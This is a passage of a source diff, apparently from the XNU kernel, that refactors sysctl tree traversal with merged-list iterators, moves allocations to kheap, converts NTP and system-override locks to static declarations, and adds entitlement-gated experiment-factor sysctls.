-sysctl_unregister_set(const char *set)
-{
-       struct sysctl_oid **oidpp, *oidp;
-
-       LINKER_SET_FOREACH(oidpp, struct sysctl_oid **, set) {
-               oidp = *oidpp;
-               if (!(oidp->oid_kind & CTLFLAG_NOAUTO)) {
-                       sysctl_unregister_oid(oidp);
-               }
-       }
 }
 
 /*
@@ -379,28 +416,6 @@ sysctl_register_fixed(void)
 }
 #endif
 
-/*
- * Register the kernel's oids on startup.
- */
-
-void
-sysctl_early_init(void)
-{
-       /*
-        * Initialize the geometry lock for reading/modifying the
-        * sysctl tree. This is done here because IOKit registers
-        * some sysctl's before bsd_init() would otherwise perform
-        * subsystem initialization.
-        */
-
-       sysctl_lock_group  = lck_grp_alloc_init("sysctl", NULL);
-       sysctl_geometry_lock = lck_rw_alloc_init(sysctl_lock_group, NULL);
-       sysctl_unlocked_node_lock = lck_mtx_alloc_init(sysctl_lock_group, NULL);
-
-       sysctl_register_set("__sysctl_set");
-       sysctl_load_devicetree_entries();
-}
-
 /*
  * New handler interface
  *   If the sysctl caller (user mode or kernel mode) is interested in the
@@ -553,6 +568,94 @@ sysctl_io_opaque(struct sysctl_req *req, void *pValue, size_t valueSize, int *ch
        return error;
 }
 
+/*
+ * SYSCTL_OID enumerators
+ *
+ * Because system OIDs are immutable, they are composed of 2 lists hanging from
+ * a first dummy OID_MUTABLE_ANCHOR node that has an immutable list hanging from
+ * its `oid_parent` field and a mutable list hanging from its oid_arg1 one.
+ *
+ * Those enumerators abstract away the implicit merging of those two lists in
+ * two possible orders:
+ * - oid_number order (which will interleave both sorted lists)
+ * - system order which will list the immutable list first,
+ *   and the mutable list second.
+ */
+struct sysctl_oid_iterator {
+       struct sysctl_oid *a;
+       struct sysctl_oid *b;
+};
+
+static struct sysctl_oid_iterator
+sysctl_oid_iterator_begin(struct sysctl_oid_list *l)
+{
+       struct sysctl_oid_iterator it = { };
+       struct sysctl_oid *a = SLIST_FIRST(l);
+
+       if (a == NULL) {
+               return it;
+       }
+
+       if (a->oid_number == OID_MUTABLE_ANCHOR) {
+               it.a = SLIST_NEXT(a, oid_link);
+               it.b = SLIST_FIRST((struct sysctl_oid_list *)a->oid_arg1);
+       } else {
+               it.a = a;
+       }
+       return it;
+}
+
+static struct sysctl_oid *
+sysctl_oid_iterator_next_num_order(struct sysctl_oid_iterator *it)
+{
+       struct sysctl_oid *a = it->a;
+       struct sysctl_oid *b = it->b;
+
+       if (a == NULL && b == NULL) {
+               return NULL;
+       }
+
+       if (a == NULL) {
+               it->b = SLIST_NEXT(b, oid_link);
+               return b;
+       }
+
+       if (b == NULL || a->oid_number <= b->oid_number) {
+               it->a = SLIST_NEXT(a, oid_link);
+               return a;
+       }
+
+       it->b = SLIST_NEXT(b, oid_link);
+       return b;
+}
+
+#define SYSCTL_OID_FOREACH_NUM_ORDER(oidp, l) \
+       for (struct sysctl_oid_iterator it = sysctl_oid_iterator_begin(l); \
+               ((oidp) = sysctl_oid_iterator_next_num_order(&it)); )
+
+static struct sysctl_oid *
+sysctl_oid_iterator_next_system_order(struct sysctl_oid_iterator *it)
+{
+       struct sysctl_oid *a = it->a;
+       struct sysctl_oid *b = it->b;
+
+       if (a) {
+               it->a = SLIST_NEXT(a, oid_link);
+               return a;
+       }
+
+       if (b) {
+               it->b = SLIST_NEXT(b, oid_link);
+               return b;
+       }
+
+       return NULL;
+}
+
+#define SYSCTL_OID_FOREACH_SYS_ORDER(oidp, l) \
+       for (struct sysctl_oid_iterator it = sysctl_oid_iterator_begin(l); \
+               ((oidp) = sysctl_oid_iterator_next_system_order(&it)); )
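As a rough user-space sketch of the merge these iterators perform (a simplification for illustration; the node type and sample values below are assumptions, not code from this commit), two lists that are each sorted by number can be walked as one ordered sequence:

#include <stdio.h>

struct node {
        int num;
        struct node *next;
};

struct iter {
        struct node *a;        /* stands in for the immutable list */
        struct node *b;        /* stands in for the mutable list */
};

/* Same idea as sysctl_oid_iterator_next_num_order(): pop the smaller head. */
static struct node *
iter_next_num_order(struct iter *it)
{
        struct node *a = it->a, *b = it->b;

        if (a == NULL && b == NULL) {
                return NULL;
        }
        if (a == NULL || (b != NULL && b->num < a->num)) {
                it->b = b->next;
                return b;
        }
        it->a = a->next;       /* on a tie, the immutable list wins, as above */
        return a;
}

int
main(void)
{
        struct node a1 = { 30, NULL }, a0 = { 10, &a1 };   /* 10 -> 30 */
        struct node b1 = { 40, NULL }, b0 = { 20, &b1 };   /* 20 -> 40 */
        struct iter it = { &a0, &b0 };

        for (struct node *n; (n = iter_next_num_order(&it)) != NULL;) {
                printf("%d\n", n->num);                    /* 10 20 30 40 */
        }
        return 0;
}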
+
 /*
  * "Staff-functions"
  *
@@ -599,38 +702,50 @@ sysctl_io_opaque(struct sysctl_req *req, void *pValue, size_t valueSize, int *ch
 STATIC void
 sysctl_sysctl_debug_dump_node(struct sysctl_oid_list *l, int i)
 {
-       int k;
        struct sysctl_oid *oidp;
+       struct sysctl_oid_list *lp;
+       const char *what;
 
-       SLIST_FOREACH(oidp, l, oid_link) {
-               for (k = 0; k < i; k++) {
-                       printf(" ");
+       SYSCTL_OID_FOREACH_SYS_ORDER(oidp, l) {
+               switch (oidp->oid_kind & CTLTYPE) {
+               case CTLTYPE_NODE:
+                       lp = oidp->oid_arg1;
+                       what = "Node   ";
+                       if (lp && SLIST_FIRST(lp) &&
+                           SLIST_FIRST(lp)->oid_number == OID_MUTABLE_ANCHOR) {
+                               what = "NodeExt";
+                       }
+                       break;
+               case CTLTYPE_INT:
+                       what = "Int    ";
+                       break;
+               case CTLTYPE_STRING:
+                       what = "String ";
+                       break;
+               case CTLTYPE_QUAD:
+                       what = "Quad   ";
+                       break;
+               case CTLTYPE_OPAQUE:
+                       what = "Opaque ";
+                       break;
+               default:
+                       what = "Unknown";
+                       break;
                }
 
-               printf("%d %s ", oidp->oid_number, oidp->oid_name);
-
-               printf("%c%c%c",
+               printf("%*s%-3d[%c%c%c%c%c] %s %s\n", i, "", oidp->oid_number,
                    oidp->oid_kind & CTLFLAG_LOCKED ? 'L':' ',
                    oidp->oid_kind & CTLFLAG_RD ? 'R':' ',
-                   oidp->oid_kind & CTLFLAG_WR ? 'W':' ');
-
-               if (oidp->oid_handler) {
-                       printf(" *Handler");
-               }
+                   oidp->oid_kind & CTLFLAG_WR ? 'W':' ',
+                   oidp->oid_kind & CTLFLAG_PERMANENT ? ' ':'*',
+                   oidp->oid_handler ? 'h' : ' ',
+                   what, oidp->oid_name);
 
-               switch (oidp->oid_kind & CTLTYPE) {
-               case CTLTYPE_NODE:
-                       printf(" Node\n");
+               if ((oidp->oid_kind & CTLTYPE) == CTLTYPE_NODE) {
                        if (!oidp->oid_handler) {
-                               sysctl_sysctl_debug_dump_node(
-                                       oidp->oid_arg1, i + 2);
+                               sysctl_sysctl_debug_dump_node(lp, i + 2);
                        }
-                       break;
-               case CTLTYPE_INT:    printf(" Int\n"); break;
-               case CTLTYPE_STRING: printf(" String\n"); break;
-               case CTLTYPE_QUAD:   printf(" Quad\n"); break;
-               case CTLTYPE_OPAQUE: printf(" Opaque/struct\n"); break;
-               default:             printf("\n");
                }
        }
 }
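A side note on the new format string: "%*s" paired with an empty string argument emits the indentation in a single call, which is what replaces the old per-character loop. A quick stand-alone check (illustration only; the values are made up):

#include <stdio.h>

int
main(void)
{
        int depth = 4;

        /* "%*s" + "" prints 'depth' spaces, then the oid number left-justified. */
        printf("%*s%-3d[%c%c%c%c%c] %s %s\n", depth, "", 7,
            'L', 'R', ' ', ' ', 'h', "Int    ", "example");
        return 0;
}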
@@ -656,9 +771,9 @@ STATIC int
 sysctl_sysctl_debug(__unused struct sysctl_oid *oidp, __unused void *arg1,
     __unused int arg2, __unused struct sysctl_req *req)
 {
-       lck_rw_lock_shared(sysctl_geometry_lock);
+       lck_rw_lock_shared(&sysctl_geometry_lock);
        sysctl_sysctl_debug_dump_node(&sysctl__children, 0);
-       lck_rw_done(sysctl_geometry_lock);
+       lck_rw_done(&sysctl_geometry_lock);
        return ENOENT;
 }
 
@@ -722,7 +837,7 @@ sysctl_sysctl_name(__unused struct sysctl_oid *oidp, void *arg1, int arg2,
        struct sysctl_oid_list *lsp = &sysctl__children, *lsp2;
        char tempbuf[10] = {};
 
-       lck_rw_lock_shared(sysctl_geometry_lock);
+       lck_rw_lock_shared(&sysctl_geometry_lock);
        while (namelen) {
                if (!lsp) {
                        snprintf(tempbuf, sizeof(tempbuf), "%d", *name);
@@ -733,7 +848,7 @@ sysctl_sysctl_name(__unused struct sysctl_oid *oidp, void *arg1, int arg2,
                                error = SYSCTL_OUT(req, tempbuf, strlen(tempbuf));
                        }
                        if (error) {
-                               lck_rw_done(sysctl_geometry_lock);
+                               lck_rw_done(&sysctl_geometry_lock);
                                return error;
                        }
                        namelen--;
@@ -741,7 +856,7 @@ sysctl_sysctl_name(__unused struct sysctl_oid *oidp, void *arg1, int arg2,
                        continue;
                }
                lsp2 = 0;
-               SLIST_FOREACH(oid, lsp, oid_link) {
+               SYSCTL_OID_FOREACH_NUM_ORDER(oid, lsp) {
                        if (oid->oid_number != *name) {
                                continue;
                        }
@@ -754,7 +869,7 @@ sysctl_sysctl_name(__unused struct sysctl_oid *oidp, void *arg1, int arg2,
                                    strlen(oid->oid_name));
                        }
                        if (error) {
-                               lck_rw_done(sysctl_geometry_lock);
+                               lck_rw_done(&sysctl_geometry_lock);
                                return error;
                        }
 
@@ -774,7 +889,7 @@ sysctl_sysctl_name(__unused struct sysctl_oid *oidp, void *arg1, int arg2,
                }
                lsp = lsp2;
        }
-       lck_rw_done(sysctl_geometry_lock);
+       lck_rw_done(&sysctl_geometry_lock);
        return SYSCTL_OUT(req, "", 1);
 }
 
@@ -819,7 +934,7 @@ sysctl_sysctl_next_ls(struct sysctl_oid_list *lsp, int *name, u_int namelen,
        struct sysctl_oid *oidp;
 
        *len = level;
-       SLIST_FOREACH(oidp, lsp, oid_link) {
+       SYSCTL_OID_FOREACH_NUM_ORDER(oidp, lsp) {
                *next = oidp->oid_number;
                *oidpp = oidp;
 
@@ -932,9 +1047,9 @@ sysctl_sysctl_next(__unused struct sysctl_oid *oidp, void *arg1, int arg2,
        struct sysctl_oid_list *lsp = &sysctl__children;
        int newoid[CTL_MAXNAME] = {};
 
-       lck_rw_lock_shared(sysctl_geometry_lock);
+       lck_rw_lock_shared(&sysctl_geometry_lock);
        i = sysctl_sysctl_next_ls(lsp, name, namelen, newoid, &j, 1, &oid);
-       lck_rw_done(sysctl_geometry_lock);
+       lck_rw_done(&sysctl_geometry_lock);
        if (i) {
                return ENOENT;
        }
@@ -966,10 +1081,10 @@ SYSCTL_NODE(_sysctl, 2, next, CTLFLAG_RD | CTLFLAG_LOCKED, sysctl_sysctl_next, "
 STATIC int
 name2oid(char *name, int *oid, size_t *len)
 {
-       char i;
+       struct sysctl_oid_iterator it;
        struct sysctl_oid *oidp;
-       struct sysctl_oid_list *lsp = &sysctl__children;
        char *p;
+       char i;
 
        if (!*name) {
                return ENOENT;
@@ -990,11 +1105,12 @@ name2oid(char *name, int *oid, size_t *len)
                *p = '\0';
        }
 
-       oidp = SLIST_FIRST(lsp);
+       it = sysctl_oid_iterator_begin(&sysctl__children);
+       oidp = sysctl_oid_iterator_next_system_order(&it);
 
        while (oidp && *len < CTL_MAXNAME) {
                if (strcmp(name, oidp->oid_name)) {
-                       oidp = SLIST_NEXT(oidp, oid_link);
+                       oidp = sysctl_oid_iterator_next_system_order(&it);
                        continue;
                }
                *oid++ = oidp->oid_number;
@@ -1012,8 +1128,9 @@ name2oid(char *name, int *oid, size_t *len)
                        break;
                }
 
-               lsp = (struct sysctl_oid_list *)oidp->oid_arg1;
-               oidp = SLIST_FIRST(lsp);
+               it = sysctl_oid_iterator_begin(oidp->oid_arg1);
+               oidp = sysctl_oid_iterator_next_system_order(&it);
+
                *p = i; /* restore */
                name = p + 1;
                for (p = name; *p && *p != '.'; p++) {
@@ -1081,14 +1198,14 @@ sysctl_sysctl_name2oid(__unused struct sysctl_oid *oidp, __unused void *arg1,
                return ENAMETOOLONG;
        }
 
-       MALLOC(p, char *, req->newlen + 1, M_TEMP, M_WAITOK);
+       p = kheap_alloc(KHEAP_TEMP, req->newlen + 1, Z_WAITOK);
        if (!p) {
                return ENOMEM;
        }
 
        error = SYSCTL_IN(req, p, req->newlen);
        if (error) {
-               FREE(p, M_TEMP);
+               kheap_free(KHEAP_TEMP, p, req->newlen + 1);
                return error;
        }
 
@@ -1098,11 +1215,11 @@ sysctl_sysctl_name2oid(__unused struct sysctl_oid *oidp, __unused void *arg1,
         * Note:        We acquire and release the geometry lock here to
         *              avoid making name2oid needlessly complex.
         */
-       lck_rw_lock_shared(sysctl_geometry_lock);
+       lck_rw_lock_shared(&sysctl_geometry_lock);
        error = name2oid(p, oid, &len);
-       lck_rw_done(sysctl_geometry_lock);
+       lck_rw_done(&sysctl_geometry_lock);
 
-       FREE(p, M_TEMP);
+       kheap_free(KHEAP_TEMP, p, req->newlen + 1);
 
        if (error) {
                return error;
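The MALLOC/FREE to kheap conversions in these hunks follow one rule worth noting: kheap_free() must be passed the same size that was given to kheap_alloc(). A condensed kernel-side sketch of the pairing as used here (a fragment, simplified from the surrounding code):

        char *p;
        size_t len = req->newlen + 1;

        p = kheap_alloc(KHEAP_TEMP, len, Z_WAITOK);
        if (p == NULL) {
                return ENOMEM;
        }
        /* ... SYSCTL_IN() and use of p ... */
        kheap_free(KHEAP_TEMP, p, len);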
@@ -1160,11 +1277,13 @@ sysctl_sysctl_oidfmt(__unused struct sysctl_oid *oidp, void *arg1, int arg2,
        int error = ENOENT;             /* default error: not found */
        u_int namelen = arg2;
        u_int indx;
+       struct sysctl_oid_iterator it;
        struct sysctl_oid *oid;
-       struct sysctl_oid_list *lsp = &sysctl__children;
 
-       lck_rw_lock_shared(sysctl_geometry_lock);
-       oid = SLIST_FIRST(lsp);
+       lck_rw_lock_shared(&sysctl_geometry_lock);
+
+       it = sysctl_oid_iterator_begin(&sysctl__children);
+       oid = sysctl_oid_iterator_next_system_order(&it);
 
        indx = 0;
        while (oid && indx < CTL_MAXNAME) {
@@ -1177,8 +1296,8 @@ sysctl_sysctl_oidfmt(__unused struct sysctl_oid *oidp, void *arg1, int arg2,
                                if (indx == namelen) {
                                        goto found;
                                }
-                               lsp = (struct sysctl_oid_list *)oid->oid_arg1;
-                               oid = SLIST_FIRST(lsp);
+                               it = sysctl_oid_iterator_begin(oid->oid_arg1);
+                               oid = sysctl_oid_iterator_next_system_order(&it);
                        } else {
                                if (indx != namelen) {
                                        error =  EISDIR;
@@ -1187,7 +1306,7 @@ sysctl_sysctl_oidfmt(__unused struct sysctl_oid *oidp, void *arg1, int arg2,
                                goto found;
                        }
                } else {
-                       oid = SLIST_NEXT(oid, oid_link);
+                       oid = sysctl_oid_iterator_next_system_order(&it);
                }
        }
        /* Not found */
@@ -1204,7 +1323,7 @@ found:
                    strlen(oid->oid_fmt) + 1);
        }
 err:
-       lck_rw_done(sysctl_geometry_lock);
+       lck_rw_done(&sysctl_geometry_lock);
        return error;
 }
 
@@ -1448,25 +1567,46 @@ sysctl_new_user(struct sysctl_req *req, void *p, size_t l)
        return error;
 }
 
+#define WRITE_EXPERIMENT_FACTORS_ENTITLEMENT "com.apple.private.write-kr-experiment-factors"
+/*
+ * Is the current task allowed to write to experiment factors?
+ * tasks with the WRITE_EXPERIMENT_FACTORS_ENTITLEMENT are always allowed to write these.
+ * In the development / debug kernel we also allow root to write them.
+ */
+STATIC bool
+can_write_experiment_factors(__unused struct sysctl_req *req)
+{
+       if (IOTaskHasEntitlement(current_task(), WRITE_EXPERIMENT_FACTORS_ENTITLEMENT)) {
+               return true;
+       }
+#if DEBUG || DEVELOPMENT
+       return !proc_suser(req->p);
+#else
+       return false;
+#endif /* DEBUG || DEVELOPMENT */
+}
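From user space, an entitled process (or, on DEVELOPMENT/DEBUG kernels, root) would set such a factor through the ordinary sysctl write path. A hypothetical caller sketch; the factor name below is a placeholder, not an OID from this commit:

#include <sys/sysctl.h>
#include <stdint.h>
#include <stdio.h>

int
main(void)
{
        int64_t new_value = 42;

        /* "kern.example_experiment_factor" is an assumed, illustrative name. */
        if (sysctlbyname("kern.example_experiment_factor",
            NULL, NULL, &new_value, sizeof(new_value)) != 0) {
                perror("sysctlbyname");   /* EPERM without the entitlement */
        }
        return 0;
}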
+
 /*
  * Traverse our tree, and find the right node, execute whatever it points
  * at, and return the resulting error code.
  */
 
 int
-sysctl_root(boolean_t from_kernel, boolean_t string_is_canonical, char *namestring, size_t namestringlen, int *name, size_t namelen, struct sysctl_req *req)
+sysctl_root(boolean_t from_kernel, boolean_t string_is_canonical,
+    char *namestring, size_t namestringlen,
+    int *name, size_t namelen, struct sysctl_req *req)
 {
        u_int indx;
        int i;
+       struct sysctl_oid_iterator it;
        struct sysctl_oid *oid;
-       struct sysctl_oid_list *lsp = &sysctl__children;
        sysctl_handler_t oid_handler = NULL;
        int error;
        boolean_t unlocked_node_found = FALSE;
        boolean_t namestring_started = FALSE;
 
        /* Get the read lock on the geometry */
-       lck_rw_lock_shared(sysctl_geometry_lock);
+       lck_rw_lock_shared(&sysctl_geometry_lock);
 
        if (string_is_canonical) {
                /* namestring is actually canonical, name/namelen needs to be populated */
@@ -1476,7 +1616,8 @@ sysctl_root(boolean_t from_kernel, boolean_t string_is_canonical, char *namestri
                }
        }
 
-       oid = SLIST_FIRST(lsp);
+       it = sysctl_oid_iterator_begin(&sysctl__children);
+       oid = sysctl_oid_iterator_next_system_order(&it);
 
        indx = 0;
        while (oid && indx < CTL_MAXNAME) {
@@ -1524,8 +1665,8 @@ sysctl_root(boolean_t from_kernel, boolean_t string_is_canonical, char *namestri
                                        goto err;
                                }
 
-                               lsp = (struct sysctl_oid_list *)oid->oid_arg1;
-                               oid = SLIST_FIRST(lsp);
+                               it = sysctl_oid_iterator_begin(oid->oid_arg1);
+                               oid = sysctl_oid_iterator_next_system_order(&it);
                        } else {
                                if (indx != namelen) {
                                        error = EISDIR;
@@ -1534,7 +1675,7 @@ sysctl_root(boolean_t from_kernel, boolean_t string_is_canonical, char *namestri
                                goto found;
                        }
                } else {
-                       oid = SLIST_NEXT(oid, oid_link);
+                       oid = sysctl_oid_iterator_next_system_order(&it);
                }
        }
        error = ENOENT;
@@ -1582,18 +1723,30 @@ found:
                goto err;
        }
 
-       /*
-        * This is where legacy enforcement of permissions occurs.  If the
-        * flag does not say CTLFLAG_ANYBODY, then we prohibit anyone but
-        * root from writing new values down.  If local enforcement happens
-        * at the leaf node, then it needs to be set as CTLFLAG_ANYBODY.  In
-        * addition, if the leaf node is set this way, then in order to do
-        * specific enforcement, it has to be of type SYSCTL_PROC.
-        */
-       if (!(oid->oid_kind & CTLFLAG_ANYBODY) &&
-           req->newptr && req->p &&
-           (error = proc_suser(req->p))) {
-               goto err;
+       if (req->newptr && req->p) {
+               if (oid->oid_kind & CTLFLAG_EXPERIMENT) {
+                       /*
+                        * Experiment factors have different permissions since they need to be
+                        * writable by procs with WRITE_EXPERIMENT_FACTORS_ENTITLEMENT.
+                        */
+                       if (!can_write_experiment_factors(req)) {
+                               error = (EPERM);
+                               goto err;
+                       }
+               } else {
+                       /*
+                        * This is where legacy enforcement of permissions occurs.  If the
+                        * flag does not say CTLFLAG_ANYBODY, then we prohibit anyone but
+                        * root from writing new values down.  If local enforcement happens
+                        * at the leaf node, then it needs to be set as CTLFLAG_ANYBODY.  In
+                        * addition, if the leaf node is set this way, then in order to do
+                        * specific enforcement, it has to be of type SYSCTL_PROC.
+                        */
+                       if (!(oid->oid_kind & CTLFLAG_ANYBODY) &&
+                           (error = proc_suser(req->p))) {
+                               goto err;
+                       }
+               }
        }
 
        /*
@@ -1612,9 +1765,11 @@ found:
         * not prevent other calls into handlers or calls to manage the
         * geometry elsewhere from blocking...
         */
-       OSAddAtomic(1, &oid->oid_refcnt);
+       if ((oid->oid_kind & CTLFLAG_PERMANENT) == 0) {
+               OSAddAtomic(1, &oid->oid_refcnt);
+       }
 
-       lck_rw_done(sysctl_geometry_lock);
+       lck_rw_done(&sysctl_geometry_lock);
 
 #if CONFIG_MACF
        if (!from_kernel) {
@@ -1637,7 +1792,7 @@ found:
         * may be into code whose reentrancy is protected by it.
         */
        if (unlocked_node_found) {
-               lck_mtx_lock(sysctl_unlocked_node_lock);
+               lck_mtx_lock(&sysctl_unlocked_node_lock);
        }
 
 #if defined(HAS_APPLE_PAC)
@@ -1660,7 +1815,7 @@ found:
        error = i;
 
        if (unlocked_node_found) {
-               lck_mtx_unlock(sysctl_unlocked_node_lock);
+               lck_mtx_unlock(&sysctl_unlocked_node_lock);
        }
 
 #if CONFIG_MACF
@@ -1682,13 +1837,16 @@ dropref:
         *              barrier to avoid waking every time through on "hot"
         *              OIDs.
         */
-       lck_rw_lock_shared(sysctl_geometry_lock);
-       if (OSAddAtomic(-1, &oid->oid_refcnt) == 1) {
-               wakeup(&oid->oid_refcnt);
+       lck_rw_lock_shared(&sysctl_geometry_lock);
+
+       if ((oid->oid_kind & CTLFLAG_PERMANENT) == 0) {
+               if (OSAddAtomic(-1, &oid->oid_refcnt) == 1) {
+                       wakeup(&oid->oid_refcnt);
+               }
        }
 
 err:
-       lck_rw_done(sysctl_geometry_lock);
+       lck_rw_done(&sysctl_geometry_lock);
        return error;
 }
 
@@ -1767,7 +1925,7 @@ sysctl(proc_t p, struct sysctl_args *uap, __unused int32_t *retval)
                }
        }
 
-       MALLOC(namestring, char *, namestringlen, M_TEMP, M_WAITOK);
+       namestring = kheap_alloc(KHEAP_TEMP, namestringlen, Z_WAITOK);
        if (!namestring) {
                oldlen = 0;
                goto err;
@@ -1775,7 +1933,7 @@ sysctl(proc_t p, struct sysctl_args *uap, __unused int32_t *retval)
 
        error = userland_sysctl(FALSE, namestring, namestringlen, name, uap->namelen, &req, &oldlen);
 
-       FREE(namestring, M_TEMP);
+       kheap_free(KHEAP_TEMP, namestring, namestringlen);
 
        if ((error) && (error != ENOMEM)) {
                return error;
@@ -1813,14 +1971,14 @@ sys_sysctlbyname(proc_t p, struct sysctlbyname_args *uap, __unused int32_t *retv
        }
        namelen = (size_t)uap->namelen;
 
-       MALLOC(name, char *, namelen + 1, M_TEMP, M_WAITOK);
+       name = kheap_alloc(KHEAP_TEMP, namelen + 1, Z_WAITOK);
        if (!name) {
                return ENOMEM;
        }
 
        error = copyin(uap->name, name, namelen);
        if (error) {
-               FREE(name, M_TEMP);
+               kheap_free(KHEAP_TEMP, name, namelen + 1);
                return error;
        }
        name[namelen] = '\0';
@@ -1830,7 +1988,7 @@ sys_sysctlbyname(proc_t p, struct sysctlbyname_args *uap, __unused int32_t *retv
         */
 
        if (uap->newlen > SIZE_T_MAX) {
-               FREE(name, M_TEMP);
+               kheap_free(KHEAP_TEMP, name, namelen + 1);
                return EINVAL;
        }
        newlen = (size_t)uap->newlen;
@@ -1852,7 +2010,7 @@ sys_sysctlbyname(proc_t p, struct sysctlbyname_args *uap, __unused int32_t *retv
 
        error = userland_sysctl(TRUE, name, namelen + 1, oid, CTL_MAXNAME, &req, &oldlen);
 
-       FREE(name, M_TEMP);
+       kheap_free(KHEAP_TEMP, name, namelen + 1);
 
        if ((error) && (error != ENOMEM)) {
                return error;
@@ -1946,3 +2104,44 @@ kernel_sysctlbyname(const char *name, void *oldp, size_t *oldlenp, void *newp, s
        }
        return error;
 }
+
+int
+scalable_counter_sysctl_handler SYSCTL_HANDLER_ARGS
+{
+#pragma unused(arg2, oidp)
+       scalable_counter_t counter = *(scalable_counter_t*) arg1;
+       uint64_t value = counter_load(&counter);
+       return SYSCTL_OUT(req, &value, sizeof(value));
+}
+
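The handler above only reads a per-cpu counter; a node is wired to it in the usual SYSCTL_PROC way. A hypothetical registration sketch (the counter and OID names are assumptions, not taken from this commit):

static scalable_counter_t example_counter;

SYSCTL_PROC(_kern, OID_AUTO, example_counter_total,
    CTLTYPE_QUAD | CTLFLAG_RD | CTLFLAG_LOCKED,
    &example_counter, 0, scalable_counter_sysctl_handler, "Q",
    "Total observed events (example)");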
+#define X(name, T) \
+int \
+experiment_factor_##name##_handler SYSCTL_HANDLER_ARGS \
+{ \
+       int error, changed = 0; \
+       T *ptr; \
+       T new_value, current_value; \
+       struct experiment_spec *spec = (struct experiment_spec *) arg1; \
+       if (!arg1) { \
+               return EINVAL; \
+       } \
+       ptr = (T *)(spec->ptr); \
+       current_value = *ptr; \
+       error = sysctl_io_number(req, current_value, sizeof(T), &new_value, &changed); \
+       if (error != 0) { \
+               return error; \
+       } \
+       if (changed) { \
+               if (new_value < (T) spec->min_value || new_value > (T) spec->max_value) { \
+                       return EINVAL; \
+               } \
+               if (os_atomic_cmpxchg(&spec->modified, false, true, acq_rel)) { \
+                       spec->original_value = current_value; \
+               } \
+               os_atomic_store_wide(ptr, new_value, relaxed); \
+       } \
+       return 0; \
+}
+
+experiment_factor_numeric_types
+#undef X
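The X(name, T) block is an X-macro: experiment_factor_numeric_types is expected to expand to one X(...) invocation per supported numeric type, stamping out a typed handler for each. A reduced illustration of the pattern (the type list and function names here are assumptions):

#include <stdint.h>

#define example_numeric_types \
        X(int, int)           \
        X(uint64, uint64_t)

#define X(name, T) \
static T \
read_factor_##name(const void *p) \
{ \
        return *(const T *)p; \
}

example_numeric_types
#undef X

/* The expansion defines read_factor_int() and read_factor_uint64(). */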
index 0ae62258f0b304f77de3cd36c3a07953c6c4c588..cbabd104b52baabc1ee5afa4992789704e14db8b 100644 (file)
@@ -187,20 +187,18 @@ static l_fp time_freq;
 static int64_t time_adjtime;
 static int updated;
 
-static lck_spin_t * ntp_lock;
-static lck_grp_t * ntp_lock_grp;
-static lck_attr_t * ntp_lock_attr;
-static lck_grp_attr_t   *ntp_lock_grp_attr;
+static LCK_GRP_DECLARE(ntp_lock_grp, "ntp_lock");
+static LCK_SPIN_DECLARE(ntp_lock, &ntp_lock_grp);
 
 #define NTP_LOCK(enable) \
                enable =  ml_set_interrupts_enabled(FALSE); \
-               lck_spin_lock(ntp_lock);
+               lck_spin_lock(&ntp_lock);
 
 #define NTP_UNLOCK(enable) \
-               lck_spin_unlock(ntp_lock);\
+               lck_spin_unlock(&ntp_lock);\
                ml_set_interrupts_enabled(enable);
 
-#define NTP_ASSERT_LOCKED()     LCK_SPIN_ASSERT(ntp_lock, LCK_ASSERT_OWNED)
+#define NTP_ASSERT_LOCKED()     LCK_SPIN_ASSERT(&ntp_lock, LCK_ASSERT_OWNED)
 
 static timer_call_data_t ntp_loop_update;
 static uint64_t ntp_loop_deadline;
@@ -831,17 +829,5 @@ init_ntp_loop(void)
 void
 ntp_init(void)
 {
-       L_CLR(time_offset);
-       L_CLR(time_freq);
-
-       ntp_lock_grp_attr = lck_grp_attr_alloc_init();
-       ntp_lock_grp =  lck_grp_alloc_init("ntp_lock", ntp_lock_grp_attr);
-       ntp_lock_attr = lck_attr_alloc_init();
-       ntp_lock = lck_spin_alloc_init(ntp_lock_grp, ntp_lock_attr);
-
-       updated = 0;
-
        init_ntp_loop();
 }
-
-SYSINIT(ntpclocks, SI_SUB_CLOCKS, SI_ORDER_MIDDLE, ntp_init, NULL);
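Several files in this commit drop boot-time lck_*_alloc_init() calls in favor of statically declared lock groups and locks, as above for the NTP spin lock. A generic kernel-side sketch of the pattern (the names are illustrative, not from this commit):

static LCK_GRP_DECLARE(example_grp, "example");
static LCK_SPIN_DECLARE(example_lock, &example_grp);

static void
example_update(void)
{
        boolean_t istate = ml_set_interrupts_enabled(FALSE);

        lck_spin_lock(&example_lock);
        /* ... short critical section ... */
        lck_spin_unlock(&example_lock);

        ml_set_interrupts_enabled(istate);
}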
index 695d335b796c467fecedd0fac728c6aeb6d912b4..ca29c90797e1a8d19a048d18fce629c545049dd1 100644 (file)
 #include <sys/kern_memorystatus.h>
 
 /* Mutex for global system override state */
-static lck_mtx_t        sys_override_lock;
-static lck_grp_t        *sys_override_mtx_grp;
-static lck_attr_t       *sys_override_mtx_attr;
-static lck_grp_attr_t   *sys_override_mtx_grp_attr;
+static LCK_GRP_DECLARE(sys_override_mtx_grp, "system_override");
+static LCK_MTX_DECLARE(sys_override_lock, &sys_override_mtx_grp);
 
 /*
  * Assertion counts for system properties (add new ones for each new mechanism)
@@ -87,9 +85,6 @@ static int64_t          fast_jetsam_assert_cnt;
 /* Wait Channel for system override */
 static uint64_t         sys_override_wait;
 
-/* Global variable to indicate if system_override is enabled */
-int                     sys_override_enabled;
-
 /* Helper routines */
 static void system_override_begin(uint64_t flags);
 static void system_override_end(uint64_t flags);
@@ -97,17 +92,6 @@ static void system_override_abort(uint64_t flags);
 static void system_override_callouts(uint64_t flags, boolean_t enable_override);
 static __attribute__((noinline)) int PROCESS_OVERRIDING_SYSTEM_DEFAULTS(uint64_t timeout);
 
-void
-init_system_override()
-{
-       sys_override_mtx_grp_attr = lck_grp_attr_alloc_init();
-       sys_override_mtx_grp = lck_grp_alloc_init("system_override", sys_override_mtx_grp_attr);
-       sys_override_mtx_attr = lck_attr_alloc_init();
-       lck_mtx_init(&sys_override_lock, sys_override_mtx_grp, sys_override_mtx_attr);
-       io_throttle_assert_cnt = cpu_throttle_assert_cnt = fast_jetsam_assert_cnt = 0;
-       sys_override_enabled = 1;
-}
-
 /* system call implementation */
 int
 system_override(__unused struct proc *p, struct system_override_args * uap, __unused int32_t *retval)
@@ -127,12 +111,6 @@ system_override(__unused struct proc *p, struct system_override_args * uap, __un
                goto out;
        }
 
-       /* Make sure that the system override syscall has been initialized */
-       if (!sys_override_enabled) {
-               error = EINVAL;
-               goto out;
-       }
-
        lck_mtx_lock(&sys_override_lock);
 
        if (flags & SYS_OVERRIDE_DISABLE) {
